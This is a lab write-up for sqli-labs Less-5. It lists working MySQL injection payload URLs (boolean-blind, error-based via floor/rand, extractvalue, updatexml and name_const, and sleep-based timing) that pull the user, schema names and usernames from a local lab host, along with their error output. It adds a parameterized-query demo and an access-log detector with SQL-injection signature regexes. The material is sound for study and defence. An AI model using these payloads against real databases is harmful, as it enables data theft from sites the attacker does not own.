References:
Sqli-labs Less-5: https://www.cnblogs.com/lcamry/p/6122257.html
12 types of error-based injection + universal statements: https://www.jianshu.com/p/bc35f8dd4f7c
Common functions in SQL injection: https://www.jianshu.com/p/146cabe5959d
sqli-labs Less-5, learning the various error-based injections:
https://blog.csdn.net/rfrder/article/details/108674217
https://blog.csdn.net/m0_47470899/article/details/118695774
https://blog.csdn.net/like98k/article/details/79436463
Detailed explanation of double-query injection: https://blog.csdn.net/Leep0rt/article/details/78556440
Principle:
The function cheat-sheet below comes from the Xiaodi day-16 notes:
like 'ro%'                      # matches values that start with "ro" (ro, root, ...)
regexp '^xiaodi[a-z]'           # matches xiaodi followed by a lowercase letter (xiaodia, xiaodib, ...)
if(condition,5,0)               # returns 5 if the condition holds, otherwise 0
sleep(5)                        # delays execution of the statement by 5 seconds
mid(a,b,c)                      # starting at position b, take c characters of string a
substr(a,b,c)                   # starting at position b, take c characters of string a
left(database(),1), database()  # left(a,b) takes the first b characters of a from the left
length(database())=8            # tests whether the current database name is 8 characters long
ord=ascii                       # ord() and ascii() behave the same for this purpose
ascii(x)=97                     # tests whether the ascii code of x equals 97 ('a')
1. Boolean injection
Only the true/false result of each request is observable, so the data has to be extracted one character at a time in a loop.
1. Determine type
http://sql-labs:8086/Less-5/?id=1'
2. Determine the version number
Check whether the first digit of the version number is 5. I don't know why sometimes I use # and sometimes I use --
http://sql-labs:8086/Less-5/?id=1' and left(version(),1)=5-- +
If the Boolean injection is correct, nothing will be displayed.
3. Database length
First look at the length of the database before you can make a judgment.
http://sql-labs:8086/Less-5/?id=1' and length(database())=8-- +
4. Guess database characters
http://sql-labs:8086/Less-5/?id=1' and left(database(),1)>'a'-- +   true means the first character is greater than 'a'
http://sql-labs:8086/Less-5/?id=1' and left(database(),1)='s'-- +   true means the first character is equal to 's'
http://sql-labs:8086/Less-5/?id=1' and left(database(),2)>'sa'-- +  true means the first two characters are greater than 'sa'
5. Get the characters of the security database
The first character of the first table (emails): ascii 101 = 'e'
http://sql-labs:8086/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1 ))=101 -- +
The second character of the first table: ascii 109 = 'm'
http://sql-labs:8086/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1 ))=109-- +
Get the first character of the second table. limit 1,1 selects the second table, referers, so the first character is 'r' (ascii 114). (mysql injection is wrong)
http://sql-labs:8086/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1 ))=114-- +
6. Use regexp to get the column names in the users table
http://sql-labs:8086/Less-5/?id=1' and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^username' limit 0,1)-- +
7. Get the contents of the users table
http://sql-labs:8086/Less-5/?id=1' and ord(mid((select ifnull(cast(username as char),0x20) from security.users order by id limit 0,1),1,1))=68-- +
Get the contents of the users table: take the ascii code of the first character of the username in the first row and compare it with 68, which is 'D'.
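Added example, not code from the write-up or from the sqli-labs project: a Python/sqlite3 stand-in for the Less-5 query shape (`SELECT ... WHERE id='$id' LIMIT 0,1`) with the string-concatenated lookup beside a parameterized one, so the boolean oracle used above can be seen appearing and disappearing. The users table, the probe strings, and the sqlite_master lookup (SQLite has no database() or left(), so the first table name is read from sqlite_master instead) are all constructed for this demonstration.

```python
import sqlite3

def build_db():
    # Constructed sample database standing in for the lab's "security" schema.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'Dumb', 'Dumb'), (2, 'Angelina', 'I-kill-you');
    """)
    return conn

def lookup_vulnerable(conn, user_id):
    # Mirrors the Less-5 shape: the request parameter is pasted straight into
    # the SQL string. Only "row found / not found" is returned, which is exactly
    # the one-bit oracle a boolean-blind probe needs.
    sql = "SELECT username FROM users WHERE id='%s' LIMIT 0,1" % user_id
    return conn.execute(sql).fetchone() is not None

def lookup_parameterized(conn, user_id):
    # Hardened form: the value is bound as a parameter, so quotes and comment
    # markers are data, never SQL syntax.
    sql = "SELECT username FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (user_id,)).fetchone() is not None

def demo():
    conn = build_db()
    # Boolean probes in the style of the write-up, translated to SQLite:
    # the first table name ("users", 5 characters) is read from sqlite_master.
    true_probe = ("1' and length((select name from sqlite_master "
                  "where type='table' limit 0,1))=5-- ")
    false_probe = ("1' and length((select name from sqlite_master "
                   "where type='table' limit 0,1))=8-- ")
    return {
        # concatenated query: the oracle answers the question
        "vuln_true": lookup_vulnerable(conn, true_probe),
        "vuln_false": lookup_vulnerable(conn, false_probe),
        # parameterized query: both probes are just a non-matching id string
        "param_true": lookup_parameterized(conn, true_probe),
        "param_false": lookup_parameterized(conn, false_probe),
        "param_plain": lookup_parameterized(conn, "1"),
    }

if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

With the concatenated query the two probes give different answers, which is the leak; with the bound parameter both probes are simply an id that matches nothing, while a plain "1" still works.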
2. Error injection
1. Obtain user permissions
http://sql-labs:8086/Less-5/?id=1' union Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor (rand(0)*2))a from information_schema.columns group by a-- +
Duplicate entry '::root@localhost::1' for key '
2. Get the database name
http://sql-labs:8086/Less-5/?id=1' union select 1,count(*),concat((select database()),floor(rand()*2)) a from information_schema.columns group by a -- +
Duplicate entry 'security1' for key ''
Sometimes the page comes back normally instead of with the error, so you need to run it a few more times. The unseeded rand() makes the key collision in the GROUP BY temporary table probabilistic; rand(0), as used above, produces a fixed sequence, so the error appears every time.
3. Get the table name in the database
http://sql-labs:8086/Less-5/?id=1' union select 1,count(*),concat((select group_concat(table_name) from information_schema.tables where table_schema='security '),floor(rand()*2))a from information_schema.columns group by a-- +
Duplicate entry 'emails,referers,uagents,users0' for key ''
Duplicate entry 'emails,referers,uagents,users1' for key ''
http://sql-labs:8086/Less-5/?id=1' union select count(*),1, concat('~',(select table_name from information_schema.tables where table_schema= 'security' limit 0,1),'~', floor(rand()*2)) as a from information_schema.tables group by a-- +
Duplicate entry '~emails~0' for key ''
Run it a couple more times to get the result. Change the offset in limit 0,1 to get the corresponding table.
4. Get column names in the database
http://sql-labs:8086/Less-5/?id=1' union select 1,count(*),concat((select group_concat(column_name) from information_schema.columns where table_name='users '),floor(rand()*2))a from information_schema.columns group by a-- +
Duplicate entry 'user_id,first_name,last_name,user,password,avatar,last_login,fai' for key ''
As shown, the output is cut off (the duplicate-entry message is truncated), but this form returns several column names at once.
http://sql-labs:8086/Less-5/?id=1' union select count(*),1, concat('~',(select column_name from information_schema.columns where table_schema= 'security' and table_name='emails' limit 0,1),'~', floor(rand()*2)) as a from information_schema.tables group by a-- +
Duplicate entry '~id~0' for key ''
This form returns one column name at a time.
5. Get data
http://sql-labs:8086/Less-5/?id=1' union select count(*),1, concat('~',(select username from users limit 0,1) ,'~', floor(rand()*2)) as a from information_schema.tables group by a-- +
Duplicate entry '~Dumb~0' for key ''
Other ways to trigger errors:
I used the double-type out-of-range overflow for error injection. I couldn't get it to work. I don't know why.
http://sql-labs:8086/Less-5/?id=1' union select (exp(~(select * from(select user())a))),2,3-- +
Using BIGINT overflow for error injection. I couldn't get it to work. I don't know why.
http://sql-labs:8086/Less-5/?id=-1 ' union select (!(select * from (select user())x) - ~0),2,3-- +
XPath function error injection
http://sql-labs:8086/Less-5/?id=-1' and extractvalue(1,concat(0x7e,(select @@version),0x7e))-- +
http://sql-labs:8086/Less-5/?id=-1' and updatexml(1,concat(0x7e,(select @@version),0x7e),1)-- +
XPATH syntax error: '~5.7.26~'
Duplicate column name error with name_const()
http://sql-labs:8086/Less-5/?id=-1' union select 1,2,3 from (select name_const(version(),1),name_const(version(),1 ))x -- +
Duplicate column name '5.7.26'
However, this method is of limited use: if the argument passed to NAME_CONST is not a constant, MySQL raises a different error (not the kind that carries data out). It seems only version() can be used.
3. Time-based injection
Using if() and sleep(); ascii 115 = 's'
http://sql-labs:8086/Less-5/?id=1' and If(ascii(substr(database(),1,1))=115,1,sleep(5))-- +
If the condition is false, the response is delayed by 5 seconds.
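A defender-side companion to the three sections above, added here and not part of the original write-up: a small access-log scanner that URL-decodes the request target (note that `+` decodes to a space, which is why the `-- +` comment tail works in a query string) and tags the probe families this page walks through (boolean-blind, error-based, time-based, information_schema enumeration). The log lines and the signature names are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not from any real server). The first four echo the
# probe shapes used in this write-up; the last two are ordinary requests.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /Less-5/?id=1%27%20and%20length(database())=8--%20+ HTTP/1.1" 200 732
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /Less-5/?id=1%27%20union%20select%201,count(*),concat((select%20database()),floor(rand()*2))a%20from%20information_schema.columns%20group%20by%20a--%20+ HTTP/1.1" 200 812
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /Less-5/?id=-1%27%20and%20extractvalue(1,concat(0x7e,(select%20@@version),0x7e))--%20+ HTTP/1.1" 200 790
10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /Less-5/?id=1%27%20and%20If(ascii(substr(database(),1,1))=115,1,sleep(5))--%20+ HTTP/1.1" 200 732
10.0.0.7 - - [01/Jan/2024:10:00:10 +0000] "GET /Less-5/?id=1 HTTP/1.1" 200 732
10.0.0.7 - - [01/Jan/2024:10:00:11 +0000] "GET /Less-5/?id=42 HTTP/1.1" 200 701
"""

# Combined-log-format line: source, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Signature names are our own labels; each regex is matched against the decoded target.
SIGNATURES = {
    # quote, then AND with one of the character-extraction functions from the cheat-sheet
    "boolean_blind": re.compile(r"'\s*and\s+(?:length|left|ascii|substr|mid|ord)\s*\(", re.I),
    # XPath / name_const error leaks, or the floor(rand()) ... group by duplicate-key trick
    "error_based": re.compile(r"(?:extractvalue|updatexml|name_const)\s*\(|floor\s*\(\s*rand\s*\(.*group\s+by", re.I),
    "time_based": re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I),
    "schema_enum": re.compile(r"information_schema\.", re.I),
    # "-- " / "--+" / trailing "#" comment tails used to discard the rest of the query
    "comment_tail": re.compile(r"--\s*[+ ]|#\s*$"),
}

def classify(target):
    """Return the list of signature names that match the URL-decoded request target."""
    decoded = unquote_plus(target)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def scan(log_text):
    """Parse each log line and return (source, timestamp, tags) for lines that match."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify(m.group("target"))
        if tags:
            findings.append((m.group("src"), m.group("ts"), tags))
    return findings

if __name__ == "__main__":
    for src, ts, tags in scan(SAMPLE_LOG):
        print(src, ts, ",".join(tags))
```

The signatures are deliberately narrow so the benign `?id=1` and `?id=42` requests are not flagged; in practice a rate of repeated near-identical requests from one source (the per-character loop of the boolean and time-based sections) is a stronger signal than any single pattern.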
This article draws on several other articles. If there is any infringement, please contact me.